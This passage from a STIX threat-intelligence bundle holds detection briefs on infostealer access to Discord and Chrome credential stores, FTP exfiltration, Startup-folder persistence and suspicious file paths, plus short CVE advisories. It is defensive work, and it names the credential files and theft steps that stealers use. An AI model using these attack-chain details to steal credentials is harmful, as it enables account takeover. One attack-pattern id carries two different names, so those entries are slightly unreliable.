      "description": "## Overview\n\nThis brief addresses the detection of unauthorized access to the Discord LevelDB database by non-Discord applications on Windows endpoints. This activity is significant as it may indicate attempts to steal Discord credentials or access sensitive user data. If confirmed malicious, this could lead to unauthorized access to user profiles, messages, and other critical information, potentially compromising the security and privacy of the affected users. The detection leverages Windows Security Event logs, specifically event code 4663, to identify file access attempts to the LevelDB directory by processes other than Discord. This behavior is commonly associated with infostealer malware such as StealC, Snake Keylogger, PXA Stealer, BlankGrabber Stealer, and Phantom Stealer, which target popular applications like Discord to exfiltrate user credentials and other sensitive data stored locally. Such attacks can result in account takeover, financial fraud, and further system compromise.\n\n## Impact\n\nIf this attack succeeds, victims face unauthorized access to their Discord accounts, leading to potential account takeover, message interception, and identity theft. Attackers can leverage compromised accounts for phishing, spreading malware, or accessing linked services. The exfiltration of sensitive user data, including personal messages and potentially financial information if stored or transmitted via Discord, can have severe privacy implications and lead to significant financial and reputational damage. While specific victim counts are not available, infostealer campaigns consistently target popular platforms like Discord, indicating a broad potential user base across various sectors is at risk from this activity.\n\n## Recommendation\n\n*   Enable \"Audit Object Access\" in Group Policy for both \"Success\" and \"Failure\" on file access to ensure Windows Security Event Code 4663 is logged, as required for the Sigma rule provided.\n*   Deploy the Sigma rule \"Detect Non-Discord App Accessing Discord LevelDB\" to your SIEM and tune for your environment to identify suspicious access attempts.\n",
      "published": "2026-07-03T13:21:19Z",
      "labels": [
        "credential-theft",
        "malware",
        "windows",
        "endpoint",
        "infostealer"
      ],
      "object_refs": [
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--da26685a-06ae-5445-a6a5-2e777dbba577"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--665e8478-2d4a-5ca5-865d-5bba6cad851d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--be03150b-b4d8-5c81-98d5-11bb06805965",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Alternative Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1048",
          "url": "https://attack.mitre.org/techniques/T1048"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e53639cf-5b46-5094-a053-a46a9fc5b702",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--be03150b-b4d8-5c81-98d5-11bb06805965",
      "target_ref": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--be03150b-b4d8-5c81-98d5-11bb06805965",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows FTP from Non-Standard Process Path Detection",
      "description": "## Overview\n\nThis analytic detects FTP connections initiated by processes located in non-standard installation paths on Windows systems. It leverages Sysmon EventCode 3 to identify network connections where the process image path does not match common directories like \"Program Files\" or \"Windows\\System32\". This behavior is a strong indicator of malicious activity, as adversaries and malware, specifically mentioning AgentTesla, frequently utilize FTP for Command and Control (C2) communications and data exfiltration. The technique allows attackers to bypass standard defenses and operate from unexpected locations, making detection crucial. Such activity, if unaddressed, can lead to significant compromise, including unauthorized data transfer, exposure of sensitive information, and overall system integrity loss. This detection targets the network connection phase of an attack, focusing on processes that deviate from legitimate software installation conventions.\n\n## Attack Chain\n\n1.  **Initial Access:** An attacker gains initial access, often via a phishing campaign (e.g., email with a malicious attachment or link), delivering malware such as AgentTesla.\n2.  **Malware Execution:** The malware payload executes, typically from a temporary directory (e.g., `%TEMP%`) or a user-writable location outside of standard program installation paths.\n3.  **Process Initiates Network Connection:** The malicious process, running from the non-standard path, attempts to establish an outbound network connection.\n4.  **FTP Protocol Usage:** The outbound connection specifically targets the File Transfer Protocol (FTP) on port 21, or its named service \"ftp\".\n5.  **Command and Control (C2) or Data Exfiltration:** The established FTP connection is used by the malware to communicate with an attacker-controlled server for Command and Control purposes (receiving further instructions) or to exfiltrate stolen sensitive data (e.g., credentials, documents) from the compromised system.\n6.  **Data Transfer:** Sensitive information is transferred to the attacker's infrastructure via FTP, leading to data loss and potential further compromise of the victim's environment.\n\n## Impact\n\nSuccessful exploitation results in unauthorized data transfer, allowing adversaries to exfiltrate sensitive information such as credentials, financial data, or intellectual property from the compromised host. This directly exposes confidential data and severely compromises the integrity and confidentiality of the affected system and potentially the wider network. Malware like AgentTesla, known to utilize this technique, can lead to significant financial losses and reputational damage for victim organizations across various sectors. The exact number of victims is not specified, but AgentTesla campaigns are widespread, impacting organizations globally.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect FTP Connection from Non-Standard Process Paths\" provided in this brief to your SIEM and tune for your environment.\n*   Enable Sysmon Event ID 3 (Network Connection) logging on all Windows endpoints to ensure the necessary telemetry for this detection is collected.\n*   Establish a baseline of legitimate third-party applications that utilize FTP from non-standard directories and create exclusions to reduce false positives, as mentioned in the falsepositives section of the rule.\n",
      "published": "2026-07-03T13:20:17Z",
      "labels": [
        "endpoint",
        "windows",
        "ftp",
        "malware",
        "data-exfiltration",
        "command-and-control"
      ],
      "object_refs": [
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_file_transfer_protocol_in_non_common_process_path.yml"
        },
        {
          "source_name": "reference",
          "url": "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--01894a68-f9f5-5d32-8acb-766200ba66c8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FreeBSD Vulnerability CVE-2026-49424 Allows Data Confidentiality Breach",
      "description": "## Overview\n\nCERT-FR has issued an advisory, CERTFR-2026-AVI-0830, detailing a critical vulnerability, CVE-2026-49424, found within the FreeBSD operating system. This vulnerability impacts FreeBSD versions 14.3 (specifically those prior to 14.3-RELEASE-p16), 14.4 (prior to 14.4-RELEASE-p7), and 15.0 (prior to 15.0-RELEASE-p11). Attackers can exploit this flaw to achieve a breach of data confidentiality. The advisory was published on July 3, 2026, referencing an earlier FreeBSD security bulletin (FreeBSD-SA-26:47) from June 30, 2026. While the specific mechanism of exploitation is not detailed, the risk highlights the potential for unauthorized access to sensitive information on affected systems.\n\n## Impact\n\nThe successful exploitation of CVE-2026-49424 can lead to a significant data confidentiality breach on affected FreeBSD systems. This means that an unauthorized attacker could gain access to sensitive information stored or processed on the vulnerable server or workstation. While the CERT-FR advisory does not specify the types of data at risk or provide victim counts, any compromise of confidentiality can have severe consequences, including intellectual property theft, privacy violations, regulatory penalties, and reputational damage for organizations using vulnerable FreeBSD installations. Organizations running these FreeBSD versions are at risk until the recommended patches are applied.\n\n## Recommendation\n\n*   Immediately apply the security patches for CVE-2026-49424 by referring to the official FreeBSD security advisory FreeBSD-SA-26:47 linked in the references section.\n*   Regularly review official FreeBSD security advisories and CERT-FR publications for updates on CVE-2026-49424 and other critical vulnerabilities.\n",
      "published": "2026-07-03T13:18:30Z",
      "labels": [
        "vulnerability",
        "freebsd",
        "cve",
        "data-confidentiality"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0830/"
        },
        {
          "source_name": "reference",
          "url": "https://www.freebsd.org/security/advisories/FreeBSD-SA-26:47.linux.asc"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49424"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Credentials from Password Stores",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1555",
          "url": "https://attack.mitre.org/techniques/T1555"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7d054452-483c-52cd-94b7-95bf6832b3bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b68988c5-1e00-5db5-baae-fd64ad9c7c8c",
      "target_ref": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebe89f7b-c9c8-58ae-b82d-30015c2c3811",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b68988c5-1e00-5db5-baae-fd64ad9c7c8c",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8cde7eaa-a82d-524b-aa3c-bc686125b772",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b68988c5-1e00-5db5-baae-fd64ad9c7c8c",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b68988c5-1e00-5db5-baae-fd64ad9c7c8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Credential Access from Browser Password Store Detection",
      "description": "## Overview\n\nThreat actors, often employing various Trojan Stealers such as SnakeKeylogger (mentioned in the source), frequently target web browser password stores and user profiles to extract sensitive information and credentials. This activity is a critical step in their data exfiltration strategy, enabling further compromise, financial fraud, or identity theft. The detection focuses on identifying processes that unexpectedly access browser user data directories on Windows systems. It specifically looks for instances where a process other than the legitimate browser application (e.g., `chrome.exe` accessing Chrome's user data) attempts to read or modify these sensitive files, indicating potential malicious activity. The methodology involves monitoring Windows Security Event Log 4663 for object access attempts and comparing the accessing process against a predefined list of allowed browser applications.\n\n## Attack Chain\n\n1.  **Initial Access**: The attacker gains initial access to the victim's system, commonly through phishing emails containing malicious attachments or links, or compromised websites leading to drive-by downloads.\n2.  **Execution**: The malicious payload, such as SnakeKeylogger, is executed on the victim's machine, often disguised as a legitimate application or document.\n3.  **Discovery**: The malware identifies the presence of installed web browsers and their respective user data directories, which store credentials, cookies, and other sensitive information.\n4.  **Credential Access**: The stealer malware initiates access to specific browser user data profiles and password stores (e.g., `Login Data` or `key4.db` files), attempting to read or decrypt stored credentials. This step often involves a non-browser process accessing these files.\n5.  **Collection**: Once accessed, the malware collects the harvested credentials, autofill data, cookies, and other valuable information from the browser's database files.\n6.  **Exfiltration**: The collected sensitive data is then encrypted and exfiltrated to the attacker's command and control (C2) server over various channels, typically HTTP/HTTPS.\n7.  **Impact**: The exfiltrated credentials are used for unauthorized access to online accounts, financial fraud, further network compromise, or sale on underground forums.\n\n## Impact\n\nSuccessful exploitation results in significant data compromise, including user credentials, financial information, and personal data stored within web browsers. This can lead to unauthorized access to corporate and personal accounts, financial fraud, and identity theft. While the source does not provide specific victim counts, stealer malware campaigns are widespread and impact individuals and organizations across all sectors globally. The exfiltration of credentials can serve as a stepping stone for further lateral movement within an organization's network, escalating the initial compromise to a full-scale breach.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM to detect suspicious browser credential access attempts by unauthorized processes.\n*   Enable Windows Security Event Log 4663 by configuring \"Audit Object Access\" for both \"Success\" and \"Failure\" events in Group Policy.\n*   Tune the `browser_app_list` lookup (or equivalent whitelist) within your detection system to accurately reflect legitimate browser applications and their expected access paths, reducing false positives.\n*   Implement strong phishing awareness training for all users to reduce the likelihood of initial access by stealer malware.\n",
      "published": "2026-07-03T13:11:48Z",
      "labels": [
        "credential-access",
        "stealer",
        "windows",
        "endpoint-detection"
      ],
      "object_refs": [
        "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger"
        },
        {
          "source_name": "reference",
          "url": "https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/snake-keylogger-malware/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d1ccf60-bf5d-5586-8ab2-0791d7304a5e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d493504-032f-5a04-b061-5604f37f84ec",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--43eacec7-2796-5a71-99cb-7997bb40d677",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d493504-032f-5a04-b061-5604f37f84ec",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4d493504-032f-5a04-b061-5604f37f84ec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Autostart Persistence via Startup Folder",
      "description": "## Overview\n\nThis threat brief details a common persistence technique where adversaries create malicious files within the Windows `%startup%` folder. This method, categorized under MITRE ATT\u0026CK T1547.001 (Boot or Logon Autostart Execution: Startup Folder), ensures that attacker-controlled code automatically executes whenever the system boots or a user logs in. While the specific threat actor or delivery mechanism is not detailed in this particular intelligence, the technique is widely adopted by various malware families and adversaries, including those associated with XWorm and Chaos Ransomware campaigns. Detection of such activity is crucial as it signifies established foothold and continued unauthorized access, potentially leading to further system compromise and data exfiltration.\n\n## Attack Chain\n\n1. Initial Access is gained by the adversary through an unspecified method (e.g., phishing, exploit).\n2. The adversary then executes a command or process to place a malicious executable or script (e.g., `malware.exe`, `script.vbs`, or a shortcut `.lnk` file) into the user's or system's Windows Startup folder. Common paths include `%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\` or `%PROGRAMDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\`.\n3. The malicious file is specifically crafted to serve as a persistence mechanism, often being a downloader, a remote access Trojan (RAT), or a component of ransomware.\n4. Upon the next system boot or user logon, the Windows operating system enumerates the contents of the Startup folder and automatically launches the newly placed malicious file.\n5. The automatically executed malicious code initiates its payload, which could involve establishing command and control (C2) communication, collecting system information, or dropping additional stages of malware.\n6. This successful execution provides the adversary with sustained access to the compromised endpoint, allowing for continued malicious operations even after system restarts or user logoffs.\n\n## Impact\n\nIf successful, the adversary gains persistent access to the compromised system, allowing for continued execution of malicious payloads. This can lead to severe consequences including, but not limited to, unauthorized access to sensitive data, installation of additional malware (e.g., ransomware, stealers, remote access Trojans as seen with XWorm and Chaos Ransomware), lateral movement within the network, and complete system compromise. The prolonged presence significantly increases the risk of data exfiltration and disruption of business operations.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Windows Autostart Persistence via Startup Folder\" in this brief to your SIEM and tune for your environment.\n*   Enable Sysmon Event ID 11 (FileCreate) logging on all Windows endpoints to ensure the necessary telemetry for this detection is collected.\n*   Implement application whitelisting or strong execution policies to prevent unauthorized executables from running from the `%startup%` folder.\n",
      "published": "2026-07-03T13:09:47Z",
      "labels": [
        "persistence",
        "execution",
        "windows",
        "malware"
      ],
      "object_refs": [
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_boot_or_logon_autostart_execution_in_startup_folder.yml"
        },
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1547/001/"
        },
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1204/002/"
        },
        {
          "source_name": "reference",
          "url": "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9b0dc501-dc4d-5325-a858-29070d4ec8e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Mozilla Security Updates — July 2026",
      "description": "## Overview\n\nAggregated Mozilla security advisories for July 2026. CVEs from this cycle are folded\ninto the list below as they are published.\n\n## Recommendation\n\nReview affected products and apply Mozilla's July 2026 security updates.\n",
      "published": "2026-07-03T13:08:31Z",
      "labels": [
        "roundup"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_unusual_process_load_mozilla_nss_mozglue_module.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obtain Credential Materials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1555",
          "url": "https://attack.mitre.org/techniques/T1555"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33d876f2-bc80-5f3f-8c63-8abedfe1df70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3e6eb3bc-e525-513d-be40-56e694cdec44",
      "target_ref": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3e6eb3bc-e525-513d-be40-56e694cdec44",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Non-Chrome Process Accessing Chrome Default Directory",
      "description": "## Overview\n\nThis threat brief focuses on the malicious activity involving non-Chrome processes attempting to access sensitive files within the Google Chrome user default folder. This technique is often employed by various adversaries, including sophisticated advanced persistent threats (APTs) like FIN7, as well as common remote access Trojans (RATs) and other malware families (e.g., StealC, Phemedrone Stealer, RedLine Stealer, AgentTesla). The activity typically occurs post-compromise, where an attacker has gained execution on a victim's system. The Chrome user default folder is a treasure trove of sensitive user data, including stored login credentials, browsing history, cookies, and other personal information. Unauthorized access to these files, observable via Windows Security Event logs (Event Code 4663), indicates a high probability of data theft and potential further system compromise. This behavior highlights the critical need for robust endpoint detection and response capabilities to protect user data from exfiltration.\n\n## Attack Chain\n\n1.  **Initial Compromise:** The attacker gains initial access to the victim's system, typically through phishing emails containing malicious attachments or links, exploitation of vulnerable software, or supply chain attacks (e.g., 3CX Supply Chain Attack mentioned in analytic story).\n2.  **Malware Delivery and Execution:** A trojan, RAT, or infostealer payload is delivered and executed on the victim's endpoint, establishing a foothold and often achieving persistence.\n3.  **Process Launch:** The malicious payload launches a new process (e.g., `malware.exe`, `beacon.exe`, or a legitimate process used for injection/living off the land) that is not a recognized legitimate Chrome process.\n4.  **Sensitive Data Access:** The launched non-Chrome process attempts to access files within the `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\` directory or similar paths containing Chrome user data. This action triggers Windows Security Event Code 4663.\n5.  **Data Collection:** The malicious process reads and collects sensitive information, such as saved browser credentials, session cookies, browsing history, and autofill data from the accessed files.\n6.  **Data Staging:** The collected data is typically staged in a temporary location on the victim's system, often compressed or encrypted, in preparation for exfiltration.\n7.  **Data Exfiltration:** The staged sensitive data is then transmitted to attacker-controlled command-and-control (C2) infrastructure via various network protocols (e.g., HTTP, HTTPS, DNS, FTP).\n\n## Impact\n\nSuccessful execution of this attack chain leads to the severe compromise of sensitive user information. Victims face direct risks of credential theft, potentially leading to account takeovers across multiple online services (email, banking, cloud platforms) and further lateral movement within an organization's network. Session hijacking through stolen cookies can bypass multi-factor authentication. The exfiltration of browsing history can provide attackers with valuable intelligence for targeted social engineering or espionage campaigns. Given the association with sophisticated groups like FIN7 and various RATs, successful attacks can precede large-scale financial fraud, intellectual property theft, or widespread data breaches, impacting both individuals and organizations financially and reputationally.\n\n## Recommendation\n\n*   **Enable Auditing:** Ensure Windows Security Event logging for `Event Code 4663` (Object Access) is fully enabled and configured to log both success and failure events for file system objects as described in the `how_to_implement` section of the brief.\n*   **Deploy Sigma Rule:** Deploy the `Detect Non-Chrome Process Accessing Chrome Default Directory` Sigma rule to your SIEM/EDR platform to detect suspicious access attempts.\n*   **Tune False Positives:** Review and tune the deployed Sigma rule for potential false positives, specifically by creating exceptions for legitimate processes that might interact with Chrome's user data, such as other Chromium-based browsers or security tooling, as noted in `falsepositives`.\n*   **Implement Application Control:** Utilize application control solutions (e.g., Windows Defender Application Control, AppLocker) to restrict unauthorized processes from executing or accessing sensitive directories.\n*   **Regular Patching and Updates:** Ensure all operating systems, web browsers, and third-party applications are regularly patched and updated to remediate vulnerabilities exploited in initial access stages.\n",
      "published": "2026-07-03T13:07:55Z",
      "labels": [
        "endpoint",
        "data-exfiltration",
        "credential-access",
        "trojan",
        "rat"
      ],
      "object_refs": [
        "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/non_chrome_process_accessing_chrome_default_dir.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8f7ced1e-b1f2-560e-9011-ef41cbacfe5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--946dff07-4ba5-598b-ac84-312da676232e",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--946dff07-4ba5-598b-ac84-312da676232e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Executable or Script Creation in Suspicious Windows Paths",
      "description": "## Overview\n\nThis threat brief focuses on a detection analytic designed to identify a common adversary technique: the creation of executable files and scripts within unusual or suspicious directories on Windows systems. Adversaries regularly abuse standard operating system directories, such as `C:\\Windows\\fonts\\` or `C:\\Users\\Public\\`, to store malicious payloads, configuration files, or persistent components. This method helps them evade detection by blending in with legitimate system files and maintaining persistence even after reboots or security product scans. The technique is a key component in many attack campaigns by various threat actors, including those behind PlugX, Warzone RAT, and Volt Typhoon. Detecting such activity is crucial for identifying post-exploitation phases, where attackers attempt to solidify their foothold, deliver further stages of malware, or prepare for privilege escalation and lateral movement.\n\n## Impact\n\nThe successful creation of executables or scripts in suspicious paths typically indicates an adversary has already gained initial access to a system. If left undetected, this activity can lead to various severe consequences, including the execution of unauthorized code, which could be anything from a simple backdoor to sophisticated ransomware. It serves as a strong indicator of an attacker establishing persistence, allowing them to maintain control over the compromised system and escalate privileges for broader environmental impact. This technique is often seen preceding data exfiltration, system destruction (e.g., in wiper attacks like WhisperGate), or ransomware deployment, posing a critical risk to data integrity, confidentiality, and system availability across targeted organizations, particularly critical infrastructure.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect file creations in suspicious paths.\n*   Ensure Sysmon Event ID 11 (FileCreate) logging is enabled on all Windows endpoints to provide the necessary telemetry for the detection rule.\n*   Investigate all alerts generated by the `Detect Executable or Script Creation in Suspicious Paths` rule, prioritizing based on the impacted user and path.\n*   Establish baselines for legitimate software installations or updates that might write files to the listed suspicious paths and add them as exclusions to reduce false positives, as mentioned in the false positives section of the rule.\n",
      "published": "2026-07-03T13:06:02Z",
      "labels": [
        "endpoint",
        "windows",
        "defense-evasion",
        "persistence",
        "execution",
        "detection"
      ],
      "object_refs": [
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/pr0xylife/status/1590394227758104576"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/executables_or_script_creation_in_suspicious_path.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9052a597-c1c2-527b-85dd-67de42006599",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ce197682-e53d-5ccb-872f-96f329af4c30",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ce197682-e53d-5ccb-872f-96f329af4c30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-4321: Critical SQL Injection in Raera Destekz Product",
